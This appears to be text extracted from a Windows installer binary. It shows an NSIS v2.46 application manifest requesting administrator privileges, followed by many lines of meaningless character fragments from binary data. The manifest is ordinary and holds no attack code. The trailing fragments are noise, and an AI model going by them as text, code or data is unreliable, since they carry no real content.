<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
,`*X"nB
x`(#pn/
x/P"u?
x]S|(~
X!s8|E
xthbZQO;?
#x)uC;t
XYYYYO#
yavmd>
yd^	d (
y>KHO8
^Yqo].
yRPCL>
Ysssssss
y@sZ38dFHM
Y<=WCP3;.DP
YYiokX`G
%yyy?0r
}}}yyyti=BF
}}}yyytt
}}}yyyttp
}}}yyyttpD
}}}yyyttppGW
/$z_}_
#ZG}#&
ZHmD~G
zmg]/0
(zMjDA2
 '{Zn>
Z}o;8%
}zwmmhvLHFFHJMZ
zz#f.<